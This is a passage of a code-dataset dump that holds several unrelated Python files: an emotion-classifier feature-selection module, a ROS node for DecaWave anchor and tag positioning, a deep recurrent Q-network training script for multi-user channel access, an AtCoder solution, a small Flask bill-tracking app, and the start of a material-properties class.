tokenizer=tokenize, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word')\n\treturn vectorizer\n\ndef get_token_vectorizer_merged(vocab=False, emotion_1=\"\", emotion_2=\"\"):\n\tif vocab:\n\t\tfilename_1 = \"featurelists/\" + emotion_1 + \"_tokens\"\n\t\tvocab_1 = file_to_array(filename_1)\n\n\t\tfilename_2 = \"featurelists/\" + emotion_2 + \"_tokens\"\n\t\tvocab_2 = file_to_array(filename_2)\n\n\t\tvocab = vocab_1 + vocab_2\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), tokenizer=tokenize, analyzer='word')\n\treturn vectorizer\n\n\n# returns a sklearn vectorizer for wordnet synsets and hypernyms\n# params: vocab (false--get vectorizer for all features, or true--get vectorizer for predefined feature list)\n#\t\t emotion (emotion to get vectorizer for, only needed if vocab=true)\ndef get_wordnet_vectorizer(vocab=False, emotion=\"\"):\n\tif vocab:\n\t\tfilename = \"featurelists/\" + emotion + \"_wordnet\"\n\t\tvocab = file_to_array(filename)\n\t\tvectorizer = CountVectorizer(tokenizer=get_synsets_hypernyms, analyzer='word', vocabulary=vocab)\n\telse:\n\t\tvectorizer = CountVectorizer(tokenizer=get_synsets_hypernyms, analyzer='word')\n\treturn vectorizer\n\n# def find_emotion_svc(tweets_list, emotion_list):\n# \tfor emotion in emotion_list:\n# \t\tterm_mx = compute_feature_mx(get_features(emotion), tweets_list)\n# \t\tclf = get_classfier(emotion)\n# \t\tpredictions = clf.predict(term_mx)\n\n# def compute_feature_mx(features, tweets):\n# \tvectorizer = CountVectorizer(ngram_range=(1,3), tokenizer=tokenize, analyzer='word', vocabulary=features)\n# \tterm_mx = vectorizer.fit_transform(tweets)\n# \treturn term_mx\n\n# function to get wordnet synsets and recursive hypernyms from every word in tweet\ndef get_synsets_hypernyms(text):\n\t# get individual tokens\n\ttokens = tokenize(text)\n\tsynsets = [] \t # synset names\n\tsynset_objs = [] # corresponding synset objects\n\tfor token in tokens:\n\t\t# get all synsets for a token\n\t\ttoken_synsets = wn.synsets(token)\n\t\tfor synset in token_synsets:\n\t\t\tif synset.name() not in synsets:\n\t\t\t\t# add synset name and object to list\n\t\t\t\tsynsets.append(\"s.\" + synset.name())\n\t\t\t\tsynset_objs.append(synset)\n\t# once all synsets are found, add all recursive hypernyms for each synset\n\tsynsets += get_hypernyms_recursive(synset_objs)\n\treturn synsets\n\n# function to get all recursive hypernyms for a list of synsets\ndef get_hypernyms_recursive(synsets):\n\tall_hypernyms = []\n\tfor synset in synsets:\n\t\t# get hypernyms for given synset\n\t\thypernyms = []\n\t\t_recurse_hypernyms(synset, hypernyms)\n\t\tif hypernyms != []:\n\t\t\tall_hypernyms += hypernyms\n\thypernym_strings = []\n\t# get list of all hypernym names\n\tfor hypernym in all_hypernyms:\n\t\thypernym_str = \"h.\" + hypernym.name()\n\t\tif hypernym_str not in hypernym_strings:\n\t\t\thypernym_strings.append(hypernym_str)\n\treturn hypernym_strings\n\n# recurse over all hypernyms for synset\ndef _recurse_hypernyms(synset, hypernyms):\n\tsynset_hypernyms = synset.hypernyms()\n\tif synset_hypernyms:\n\t\t# add all hypernyms to list\n\t\thypernyms += synset_hypernyms\n\t\t# recurse to get hypernyms of each hypernym on this level\n\t\tfor hypernym in synset_hypernyms:\n\t\t\t_recurse_hypernyms(hypernym, hypernyms)\n\n# function for greedy additive feature selection algorithm\n# should produce reduced list of features\ndef greedy_feature_select(term_mx, labels, feature_names):\n\n\tclf = svm.LinearSVC()\n\n\ttotal_features = term_mx\t\t# full feature-document mx\n\tcurrent_features = np.array([]) # feature-doc mx for selected features\n\tcurrent_feature_names = []\t\t# selected feature names\n\tused_feature_idxs = []\t\t\t# indices for features that have already been selected\n\n\tprev_score = 0\t\t\t# f1 score from previous iteration of loop\n\tstill_improving = True \t# boolean for whether to continue iterating\n\twhile (still_improving):\n\t\tmax_score = 0\t# best f1 score so far\n\t\tbestFeature = 0 # index of feature that, when added, gives best f1 score so far\n\t\t# print(\"current feature list: \" + str(current_feature_names))\n\n\t\t# loop over all features in total matrix\n\t\tfor j in range(0, int(total_features.shape[1])):\n\t\t\tif j not in used_feature_idxs:\n\t\t\t\t# make test mx by adding col j of total matrix to mx of already selected features\n\t\t\t\tif current_features.size == 0:\n\t\t\t\t\ttestFeatures = total_features.getcol(j)\n\t\t\t\telse:\n\t\t\t\t\ttestFeatures = scipy.sparse.hstack([current_features,total_features.getcol(j)])\n\n\t\t\t\t# get k-fold cross val score for test matrix\n\t\t\t\t# if average better than existing max score, save this score and feature\n\t\t\t\tscores = cross_validation.cross_val_score(clf, testFeatures, labels, scoring='f1', cv=5)\n\t\t\t\tif scores.mean() > max_score and bestFeature not in used_feature_idxs:\n\t\t\t\t\tmax_score = scores.mean()\n\t\t\t\t\tbestFeature = j\n\n\t\t# continue iterating as long as adding a feature improves the score\n\t\tif (max_score > prev_score):\n\t\t\t# add next best feature to feature list if it improves overall score\n\t\t\tif current_features.size == 0:\n\t\t\t\tcurrent_features = total_features.getcol(bestFeature)\n\t\t\telse:\n\t\t\t\tcurrent_features = scipy.sparse.hstack([current_features, total_features.getcol(bestFeature)])\n\t\t\tcurrent_feature_names.append(feature_names[bestFeature])\n\t\t\tused_feature_idxs.append(bestFeature)\n\t\t\tprev_score = max_score\n\t\telse:\n\t\t\tstill_improving = False\n\n\t# print accuracy, precision recall, f1 scores\n\taccuracy = cross_validation.cross_val_score(clf, current_features, labels, scoring='accuracy', cv=5)\n\tprecision = cross_validation.cross_val_score(clf, current_features, labels, scoring='precision', cv=5)\n\trecall = cross_validation.cross_val_score(clf, current_features, labels, scoring='recall', cv=5)\n\tf1 = cross_validation.cross_val_score(clf, current_features, labels, scoring='f1', cv=5)\n\n\tprint(\"Accuracy: \" + str(accuracy) + \"\\n\")\n\tprint(\"Precision: \" + str(precision) + \"\\n\")\n\tprint(\"Recall: \" + str(recall) + \"\\n\")\n\tprint(\"F1: \" + str(f1) + \"\\n\")\n\n\t# return selected feature names for saving\n\treturn current_feature_names\n","sub_path":"Thesis/Thesis Code/svc_emotions.py","file_name":"svc_emotions.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"639243612","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\n\nfrom snowmower_msgs.msg import DecaWaveMsg\nfrom ubo_pkg.msg import AnchorPosMsg\nfrom ubo_pkg.msg import AnchorPosArray\nfrom ubo_pkg.msg import TagPosMsg\n\nfrom time import sleep\nfrom math import sqrt\n\nclass Env:\n\n\t# On suppose anchor1 a l'origine du repere, anchor2 sur l'axe des abscisses\n\t# listAnch est un tableau contenant les coordonnees des differents ancres\n\tlistAnch = {\"anchor0\":(0,0), \"anchor1\":(0,0), \"anchor2\":(0,0)}\n\n\t# tag contient les coordonnees du tag\n\ttag = (0,0) \n\n\tdef __init__(self):\n\n\t\t# Methode appelee lors de la reception d'un message contenant les distances entre les ancres.\n\t\t# Elle met a jour les distances contenues dans le tableau listAnch si le set d'erreur recu est non erronne\n\t\tdef updateAnchor(msg):\n\n\t\t\t# Si l'une des 3 valeurs de distance est egale de 0, on considere le set comme erronne et on ignore la mise a jour\n\t\t\t# La premiere valeure est toujours nulle donc on parcours seulement le reste du tableau\n\t\t\tif all(elem != 0 for elem in msg.dist[1:]):\n\n\t\t\t\t# Recuperation des valeurs\n\t\t\t\td0_1 = msg.dist[1]\n\t\t\t\td0_2 = msg.dist[2]\n\t\t\t\td1_2 = msg.dist[3]\n\n\t\t\t\t# On initialise l'origine du repere, anchor1, et le point sur l'axe des abscisses, anchor2, a l'aide de la distance les separant\n\t\t\t\tEnv.listAnch[\"anchor1\"] = (0,0)\n\t\t\t\tEnv.listAnch[\"anchor2\"] = (d1_2,0)\n\n\t\t\t\t# Calcul des coordonnes de anchor0 a l'aide de la distance le separant des deux autres.\n\t\t\t\t# Le detail des calculs se trouve dans production$\\Robots\\Decawave\\Poc\\15-07-2016 (les coordonnes calculees ne sont pas celles de A2 mais bien celles de A0 dans notre cas)\t\t\n\t\t\t\tx = d1_2**2 - d0_2**2 + d0_1**2\n\t\t\t\tx /= d1_2*2\n\n\t\t\t\ty = sqrt(abs(d0_1**2 - x**2))\t\t\n\t\t\n\t\t\t\tEnv.listAnch[\"anchor0\"] = (x,y)\n\n\t\t\t\t# Les coordonnees de anchor0 ainsi que la distance entre anchor1 et anchor2 ne seront jamais strictement egales a 0 en pratique.\n\t\t\t\t# Si l'une des valeures calculees, on considere qu'il y a eu une erreur quelque part et on ne les prend pas en compte\n\t\t\t\tif (x != 0 and y != 0 and d1_2 != 0):\n\t\t\t\t\t\n\t\t\t\t\t# Creation des messages a envoyer\n\t\t\t\t\tanchMsg0 = AnchorPosMsg()\n\t\t\t\t\tanchMsg0.coord = Env.listAnch[\"anchor0\"]\n\t\t\t\t\tanchMsg1 = AnchorPosMsg()\n\t\t\t\t\tanchMsg1.coord = Env.listAnch[\"anchor1\"]\n\t\t\t\t\tanchMsg2 = AnchorPosMsg()\n\t\t\t\t\tanchMsg2.coord = Env.listAnch[\"anchor2\"]\n\n\t\t\t\t\t# Envoi sur le topic /anchorPos d'un tableau contenant les coordonnees des ancres\n\t\t\t\t\tanchArray = AnchorPosArray()\n\t\t\t\t\tanchArray.header.frame_id = \"environnement\"\n\t\t\t\t\tanchArray.header.stamp = rospy.get_rostime()\n\t\t\t\t\tanchArray.anchor0 = anchMsg0\n\t\t\t\t\tanchArray.anchor1 = anchMsg1\n\t\t\t\t\tanchArray.anchor2 = anchMsg2\n\t\t\t\t\tpubAnch.publish(anchArray)\n\n\t\t# Methode appelee lors de la reception d'un message contenant les distances entre le tag et les ancres.\n\t\t# Elle met a jour les distances contenues dans le tableau listAnch si le set d'erreur recu est non erronne\n\t\tdef updateTag(msg):\n\n\t\t\t# Si l'une des 3 valeurs de distance est egale de 0, on considere le set comme erronne et on ignore la mise a jour\n\t\t\t# La derniere valeure est toujours nulle donc on parcours seulement le reste du tableau\n\t\t\tif all(elem != 0 for elem in msg.dist[:3]):\n\n\t\t\t\t# Recuperation des valeurs\n\t\t\t\td0_t = msg.dist[0]\n\t\t\t\td1_t = msg.dist[1]\n\t\t\t\td2_t = msg.dist[2]\n\t\t\n\t\t\t\t# On utilise la meme methode de calcul qu'au dessus pour calculer la position du tag a partir de ancre1 et ancre2\n\t\t\t\tx = Env.listAnch[\"anchor2\"][0]**2 - d2_t**2 + d1_t**2\n\t\t\t\tif Env.listAnch[\"anchor2\"][0] != 0:\n\t\t\t\t\tx /= 2*Env.listAnch[\"anchor2\"][0]\n\t\t\t\t# BFA le 5/9/16\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\treturn\n\n# Il y a cependant ici une ambiguite a resoudre car le tag a deux positions ou il peut se trouver.\n# Pour connaitre la position reelle, on prend la position pour laquelle la distance au tag s'approche le plus de la distance renvoyee par les balises\n\t\t\t\ty1 = sqrt(abs(d1_t**2 - x**2))\n\t\t\t\ty2 = -y1\n\n\t\t\t\td0_t1 = sqrt(abs(x - Env.listAnch[\"anchor0\"][0])**2 + abs(y1 - Env.listAnch[\"anchor0\"][1])**2)\n\t\t\t\td0_t2 = sqrt(abs(x - Env.listAnch[\"anchor0\"][0])**2 + abs(y2 - Env.listAnch[\"anchor0\"][1])**2)\n\n\t\t\t\tif (abs(d0_t - d0_t1) < abs(d0_t - d0_t2)):\n\t\t\t\t\tEnv.tag = (x, y1)\n\t\t\t\telse:\n\t\t\t\t\tEnv.tag = (x, y2)\n\n\t\t\t\t# Si les coordonnes calculees du tag sont non nulles (meme raison que precedemment), on envoie un message.\n\t\t\t\t# Le message est sur le topic /tagPos et contient simplement les coordonnes du tag \n\t\t\t\tif (x != 0 and Env.tag[1] != 0):\n\t\t\t\t\ttagMsg = TagPosMsg()\n\t\t\t\t\ttagMsg.header.frame_id = \"environnement\"\n\t\t\t\t\ttagMsg.header.stamp = rospy.get_rostime()\n\t\t\t\t\ttagMsg.coord = Env.tag\n\t\t\t\t\tpubTag.publish(tagMsg)\n\n\n\t\t# Publishers et subscribers\n\t\tpubTag = rospy.Publisher(\"tagPos\", TagPosMsg, queue_size=10)\n\t\tpubAnch = rospy.Publisher(\"anchorPos\", AnchorPosArray, queue_size=10)\n\t\trospy.Subscriber(\"dw/t0/data\", DecaWaveMsg, updateTag, queue_size=10)\t\n\t\trospy.Subscriber(\"dw/a0/data\", DecaWaveMsg, updateAnchor, queue_size=10)\n\n\t\trospy.spin()\n\n\nif __name__ == '__main__':\n\n\trospy.init_node(\"environnement\")\n\n\tenv = Env()\n\n\n","sub_path":"ubo_pkg/scripts/environnement.py","file_name":"environnement.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476478951","text":"from multi_user_network_env import env_network\nfrom drqn import QNetwork, Memory\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom collections import deque\nimport os\nimport tensorflow as tf\nimport time\n\nTIME_SLOTS = 100000 # number of time-slots to run simulation\nNUM_CHANNELS = 2 # Total number of channels\nNUM_USERS = 3\nNUM_SIZE = 3\nATTEMPT_PROB = 1 # attempt probability of ALOHA based models\n# TABLE = np.array([[0,1,2],[3,4,5],[6,7,8]])\n# TABLE = np.arange((NUM_CHANNELS+1) * ((NUM_SIZE-1)*3 + 1)).reshape(((NUM_CHANNELS+1)), ((NUM_SIZE-1)*3 + 1))\nTABLE = np.arange((NUM_CHANNELS+1) * NUM_SIZE**NUM_SIZE ).reshape(((NUM_CHANNELS+1) , NUM_SIZE**NUM_SIZE))\nCHANNEL_CAPACITY = 7\n\n# It creates a one hot vector of a number as num with size as len\ndef one_hot(num, len):\n assert num >= 0 and num < len, \"error\"\n vec = np.zeros([len], np.int32)\n vec[num] = 1\n return vec\n\n# generates next-state from action and observation\ndef state_generator(action, obs):\n input_vector = []\n if action is None:\n print('None')\n sys.exit()\n for user_i in range(action.size):\n x, y = np.where(TABLE == action[user_i])\n index = np.array(list(zip(x, y)))\n\n input_vector_i = one_hot(index[0][0], NUM_CHANNELS + 1)\n # size_choose = one_hot(index[0][1], NUM_SIZE)\n size_choose = one_hot(index[0][1], NUM_SIZE**NUM_SIZE)\n channel_alloc = obs[-1]\n # input_vector_i = np.append(input_vector_i, size_choose)\n input_vector_i = np.append(input_vector_i, np.append(size_choose, channel_alloc))\n input_vector_i = np.append(input_vector_i, int(obs[user_i][0])) # ACK\n input_vector.append(input_vector_i)\n return input_vector\n\nmemory_size = 3000 # size of experience replay deque\nbatch_size = 6 # Num of batches to train at each time_slot\npretrain_length = batch_size # this is done to fill the deque up to batch size before training\nhidden_size = 128 # Number of hidden neurons\nlearning_rate = 0.0001 # learning rate\nexplore_start = .02 # initial exploration rate\nexplore_stop = 0.01 # final exploration rate\ne_greedy=0.9\ndecay_rate = 0.0001 # rate of exponential decay of exploration\ngamma = 0.9 # discount factor\nnoise = 0.1\nstep_size = 6 # length of history sequence for each datapoint in batch\nstate_size = NUM_CHANNELS + 1 + NUM_SIZE**NUM_SIZE + NUM_CHANNELS + 1 + 1# length of input (2 * k + 2) :k = NUM_CHANNELS\naction_size = (NUM_CHANNELS + 1)* NUM_SIZE**NUM_SIZE # length of output (k+1)\nalpha = 0 # co-operative fairness constant\nbeta = 1 # Annealing constant for Monte - Carlo\n\n# reseting default tensorflow computational graph\ntf.reset_default_graph()\n\n# initializing the environment\nenv = env_network(NUM_USERS, NUM_CHANNELS, NUM_SIZE , ATTEMPT_PROB, TABLE, CHANNEL_CAPACITY)\n\n# initializing deep Q network\nmainQN = QNetwork(name='main', hidden_size=hidden_size, learning_rate=learning_rate, step_size=step_size,\n state_size=state_size, action_size=action_size)\n\n# this is experience replay buffer(deque) from which each batch will be sampled and fed to the neural network for training\nmemory = Memory(max_size=memory_size)\n\n# this is our input buffer which will be used for predicting next Q-values\nhistory_input = deque(maxlen=step_size)\n\n# to sample random actions for each user\naction = env.sample()\nobs = env.step(action)\nstate = state_generator(action, obs)\nreward = [i[1] for i in obs[:NUM_USERS]]\n\n##############################################\nfor ii in range(pretrain_length * step_size * 5):\n action = env.sample()\n obs = env.step(action) # obs is a list of tuple with [[(ACK,REW) for each user] ,CHANNEL_RESIDUAL_CAPACITY_VECTOR]\n next_state = state_generator(action, obs)\n reward = [i[1] for i in obs[:NUM_USERS]]\n memory.add((state, action, reward, next_state))\n state = next_state\n history_input.append(state)\n\ndef get_states_user(batch):\n states = []\n for user in range(NUM_USERS):\n states_per_user = []\n for each in batch:\n states_per_batch = []\n for step_i in each:\n try:\n states_per_step = step_i[0][user]\n except IndexError:\n print(step_i)\n print(\"-----------\")\n print(\"eror\")\n sys.exit()\n states_per_batch.append(states_per_step)\n states_per_user.append(states_per_batch)\n states.append(states_per_user)\n # print len(states)\n return np.array(states)\n\ndef get_actions_user(batch):\n actions = []\n for user in range(NUM_USERS):\n actions_per_user = []\n for each in batch:\n actions_per_batch = []\n for step_i in each:\n actions_per_step = step_i[1][user]\n actions_per_batch.append(actions_per_step)\n actions_per_user.append(actions_per_batch)\n actions.append(actions_per_user)\n return np.array(actions)\n\ndef get_rewards_user(batch):\n rewards = []\n for user in range(NUM_USERS):\n rewards_per_user = []\n for each in batch:\n rewards_per_batch = []\n for step_i in each:\n rewards_per_step = step_i[2][user]\n rewards_per_batch.append(rewards_per_step)\n rewards_per_user.append(rewards_per_batch)\n rewards.append(rewards_per_user)\n return np.array(rewards)\n\ndef get_next_states_user(batch):\n next_states = []\n for user in range(NUM_USERS):\n next_states_per_user = []\n for each in batch:\n next_states_per_batch = []\n for step_i in each:\n next_states_per_step = step_i[3][user]\n next_states_per_batch.append(next_states_per_step)\n next_states_per_user.append(next_states_per_batch)\n next_states.append(next_states_per_user)\n return np.array(next_states)\n\ninterval = 1 # debug interval\n# saver object to save the checkpoints of the DQN to disk\nsaver = tf.train.Saver()\n# initializing the session\nsess = tf.Session()\n# initialing all the tensorflow variables\nsess.run(tf.global_variables_initializer())\n# list of total rewards\ntotal_rewards = []\nloss_all = []\nchannel_utilization = []\navg_reward = []\navg_loss = []\navg_channel_utilization = []\n# cumulative reward\ncum_r = [0]\n# cumulative collision\ncum_collision = [0]\n\n\ncheck_index = []\nfor i in range(1,4):\n for j in range(1,4):\n for k in range(1,4):\n check_index.append([i,j,k])\n\n##########################################################################\n#### main simulation loop ########\nfor time_step in range(TIME_SLOTS):\n # changing beta at every 50 time-slots\n if time_step % 50 == 0:\n if time_step < 5000:\n beta -= 0.001\n # curent exploration probability\n explore_p = explore_stop + (explore_start - explore_stop) * np.exp(-decay_rate * time_step)\n # Exploration\n if explore_p > np.random.rand():\n # random action sampling\n action = env.sample()\n print(\"explored\")\n # if e_greedy < np.random.rand():\n # # random action sampling\n # action = env.sample()\n # print(\"explored\")\n # Exploitation\n else:\n # initializing action vector\n action = np.zeros([NUM_USERS], dtype=np.int32)\n # converting input history into numpy array\n state_vector = np.array(history_input)\n # print np.array(history_input)\n print(\"///////////////\")\n for each_user in range(NUM_USERS):\n # feeding the input-history-sequence of (t-1) slot for each user seperately\n feed = {mainQN.inputs_: state_vector[:, each_user].reshape(1, step_size, state_size)}\n # predicting Q-values of state respectively\n Qs = sess.run(mainQN.output, feed_dict=feed)\n # lstmout = sess.run(mainQN.lstm_out, feed_dict=feed)\n # reducedout = sess.run(mainQN.reduced_out, feed_dict=feed)\n # Monte-carlo sampling from Q-values (Boltzmann distribution)\n ##################################################################################\n prob1 = (1 - alpha) * np.exp(beta * Qs)\n # Normalizing probabilities of each action with temperature (beta)\n prob = prob1 / np.sum(np.exp(beta * Qs)) + alpha / (NUM_CHANNELS + 1)\n # # print prob\n # This equation is as given in the paper :\n # Deep Multi-User Reinforcement Learning for\n # Distributed Dynamic Spectrum Access :\n # @Oshri Naparstek and Kobi Cohen (equation 12)\n ########################################################################################\n # choosing action with max probability\n action[each_user] = np.argmax(prob, axis=1)\n # action[each_user] = np.argmax(Qs,axis=1)\n if time_step % interval == 0:\n # print(state_vector)\n print(state_vector[:, each_user])\n # print(state_vector[:, each_user].reshape(1, step_size, state_size))\n # print(lstmout)\n # print(lstmout[:,-1,:])\n # print(reducedout)\n # print(reducedout.shape == lstmout[:,-1,:].shape)\n print(Qs)\n # print(prob, np.sum(np.exp(beta * Qs)))\n # taking action as predicted from the q values and receiving the observation from thr envionment\n obs = env.step(action) # obs is a list of tuple with [(ACK,REW) for each user ,(CHANNEL_RESIDUAL_CAPACITY_VECTOR)]\n print(action)\n print(obs)\n # Generate next state from action and observation\n next_state = state_generator(action, obs)\n print(next_state)\n # reward for all users given by environment\n reward = [i[1] for i in obs[:NUM_USERS]]\n print(reward)\n # add new experiences into the memory buffer as (state, action , reward , next_state) for training\n memory.add((state, action, reward, next_state))\n state = next_state\n # add new experience to generate input-history sequence for next state\n history_input.append(state)\n\n # calculating sum of rewards\n sum_r = np.sum(reward)\n total_rewards.append(sum_r)\n # calculating cumulative reward\n cum_r.append(cum_r[-1] + sum_r)\n # If NUM_CHANNELS = 2 , total possible reward = 2 , therefore collision = (2 - sum_r) or (NUM_CHANNELS - sum_r)\n r_num = 0\n for r in reward:\n if r > 0:\n r_num += 1\n collision = NUM_CHANNELS - r_num\n # collision = NUM_CHANNELS - sum_r\n # calculating cumulative collision\n cum_collision.append(cum_collision[-1] + collision)\n #############################\n # for co-operative policy we will give reward-sum to each user who have contributed\n # to play co-operatively and rest 0\n # for i in range(len(reward)):\n # if reward[i] > 0:\n # reward[i] = sum_r\n #############################\n\n for i in range(len(action)):\n x, y = np.where(TABLE == action[i])\n index = np.array(list(zip(x, y)))\n size_all = check_index[index[0][1]]\n if obs[i][0] == 1:\n if sum(size_all) <= CHANNEL_CAPACITY:\n channel_utilization.append(sum(size_all) / CHANNEL_CAPACITY)\n else:\n channel_utilization.append((-np.log(reward[i] - 1)) / CHANNEL_CAPACITY)\n else:\n channel_utilization.append(0)\n\n\n # Training block starts\n ###################################################################################\n\n # sampling a batch from memory buffer for training\n batch = memory.sample(batch_size, step_size)\n\n # matrix of rank 4\n # shape [NUM_USERS,batch_size,step_size,state_size]\n states = get_states_user(batch)\n\n # matrix of rank 3\n # shape [NUM_USERS,batch_size,step_size]\n actions = get_actions_user(batch)\n\n # matrix of rank 3\n # shape [NUM_USERS,batch_size,step_size]\n rewards = get_rewards_user(batch)\n\n # matrix of rank 4\n # shape [NUM_USERS,batch_size,step_size,state_size]\n next_states = get_next_states_user(batch)\n\n # Converting [NUM_USERS,batch_size] -> [NUM_USERS * batch_size]\n # first two axis are converted into first axis\n\n states = np.reshape(states, [-1, states.shape[2], states.shape[3]])# shape [NUM_USERS*batch_size, step_size, state_size]\n actions = np.reshape(actions, [-1, actions.shape[2]])# shape [NUM_USERS*batch_size, step_size]\n rewards = np.reshape(rewards, [-1, rewards.shape[2]])# shape [NUM_USERS*batch_size, step_size]\n next_states = np.reshape(next_states, [-1, next_states.shape[2], next_states.shape[3]])# shape [NUM_USERS*batch_size, step_size, state_size]\n\n # creating target vector (possible best action)\n target_Qs = sess.run(mainQN.output, feed_dict={mainQN.inputs_: next_states})# shape [NUM_USERS*batch_size, action_size]\n\n # Q_target = reward + gamma * Q_next\n targets = rewards[:, -1] + gamma * np.max(target_Qs, axis=1)# shape [NUM_USERS*batch_size, ]\n\n # calculating loss and train using Adam optimizer\n loss, _ = sess.run([mainQN.loss, mainQN.opt],\n feed_dict={mainQN.inputs_: states,\n mainQN.targetQs_: targets,\n mainQN.actions_: actions[:, -1]})# actions[:, -1].shape [NUM_USERS*batch_size,]\n\n loss_all.append(loss)\n\n if (time_step == 1000):\n plt.figure(1)\n\n print(\"Loss at (t=\"+ str(time_step) + \") = \" + str(loss))\n plt.subplot(311)\n plt.plot(loss_all, 'r-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Q Loss\")\n plt.title('TIME vs Loss')\n\n print(\"rewards at (t=\" + str(time_step) + \") = \" + str(sum_r))\n plt.subplot(312)\n plt.plot(total_rewards, 'b-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Total Rewards\")\n plt.title('TIME vs Total_Rewards')\n\n print(\"Utilization at (t=\" + str(time_step) + \") = \" + str(channel_utilization[time_step]))\n print(\"channel at (t=\" + str(time_step) + \") = \" + str(state[0:3]))\n print(channel_utilization)\n print(len(channel_utilization))\n plt.subplot(313)\n plt.plot(channel_utilization, 'g-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"CHannel_Utilization\")\n plt.title('TIME vs CHannel_Utilization')\n\n plt.show()\n\n\n if (time_step% 60000 == 0 and time_step>0):\n plt.figure(1)\n\n print(\"Loss at (t=\" + str(time_step) + \") = \" + str(loss))\n plt.subplot(311)\n plt.plot(loss_all, 'r-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Q Loss\")\n plt.title('TIME vs Loss')\n\n print(\"rewards at (t=\" + str(time_step) + \") = \" + str(sum_r))\n plt.subplot(312)\n plt.plot(total_rewards, 'b-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Total Rewards\")\n plt.title('TIME vs Total_Rewards')\n\n print(\"packets at (t=\" + str(time_step) + \") = \" + str(channel_utilization[time_step]))\n print(channel_utilization)\n print(len(channel_utilization))\n plt.subplot(313)\n plt.plot(channel_utilization, 'g-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"CHannel_Utilization\")\n plt.title('TIME vs CHannel_Utilization')\n\n plt.show()\n\n if (time_step % 100 == 0):\n avg_loss.append(np.sum(loss_all)/ time_step)\n avg_reward.append(np.sum(total_rewards) / time_step)\n avg_channel_utilization.append(np.sum(channel_utilization) / time_step)\n\n # Training block ends\n ########################################################################################\n\n # if time_step % 5000 == 4999:\n # plt.figure(1)\n # plt.subplot(211)\n # # plt.plot(np.arange(1000),total_rewards,\"r+\")\n # # plt.xlabel('Time Slots')\n # # plt.ylabel('total rewards')\n # # plt.title('total rewards given per time_step')\n # # plt.show()\n # plt.plot(np.arange(5001), cum_collision, \"r-\")\n # plt.xlabel('Time Slot')\n # plt.ylabel('cumulative collision')\n # # plt.show()\n #\n # plt.subplot(212)\n # plt.plot(np.arange(5001), cum_r, \"r-\")\n # plt.xlabel('Time Slot')\n # plt.ylabel('Cumulative reward of all users')\n # # plt.title('Cumulative reward of all users')\n # plt.show()\n #\n # total_rewards = []\n # cum_r = [0]\n # cum_collision = [0]\n # saver.save(sess, 'checkpoints/dqn_multi-user.ckpt')\n # # print time_step,loss , sum(reward) , Qs\n\n print(\"*************************************************\")\n\nsaver.save(sess, 'checkpoints/dqn_multi-user.ckpt')\n\nplt.figure(1)\nplt.subplot(311)\nplt.plot(avg_loss)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Loss\")\nplt.title(\"TIME vs Average Loss\")\nplt.subplot(312)\nplt.plot(avg_reward)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Reward\")\nplt.title(\"TIME vs Average Reward\")\nplt.subplot(313)\nplt.plot(avg_channel_utilization)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Channel Utilization\")\nplt.title(\"TIME vs Average Channel Utilization\")\nplt.show()\n\n\n\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126314182","text":"N, A, B = map(int, input().split())\nans=0\nfor i in range(N):\n t = 0\n j = i+1\n while j != 0:\n t += j%10\n j //= 10\n if A <= t and t <= B:\n ans += i+1\n\nprint(ans)","sub_path":"work/atcoder/abc/abc083/B/answers/896331_rin1120.py","file_name":"896331_rin1120.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"485562221","text":"from flask import Flask, flash, session, request, redirect, render_template, url_for\nfrom db.data_layer import get_all_bills, get_bill, create_bill, delete_bill, update_bill\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n db_bills = get_all_bills()\n return render_template('index.html', bills=db_bills)\n\n@app.route('/add_bill', methods=['POST'])\ndef add_bill():\n description = request.form['html_description']\n amount = request.form['html_amount']\n create_bill(amount, description)\n return redirect(url_for('index'))\n\n@app.route('/edit_bill/')\ndef edit_bill(bill_id):\n db_bill = get_bill(bill_id)\n return render_template('edit.html', bill=db_bill)\n\n@app.route('/update_bill', methods=['POST'])\ndef update_bill_request():\n billid = request.form['html_id']\n description = request.form['html_description']\n amount = request.form['html_amount']\n update_bill(billid, amount, description)\n return redirect(url_for('index'))\n\n@app.route('/delete_bill/')\ndef delete_bill_request(bill_id):\n delete_bill(bill_id)\n return redirect(url_for('index'))\n\napp.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"88213333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 26 09:16:38 2017\n\n@author: daukes\n\"\"\"\n\nclass MaterialProperty(object):\n def __init__(self,name,color,thickness,E1,E2,density,poisson,is_adhesive,is_rigid,is_conductive,is_flexible):\n self.name = name\n self.color = color\n self.thickness = thickness\n self.E1 = E1\n self.E2 = E2\n self.density = density\n self.poisson = poisson\n self.is_adhesive = is_adhesive\n self.is_rigid = is_rigid\n self.is_conductive = is_conductive\n self.is_flexible = is_flexible\n def copy(self):\n return 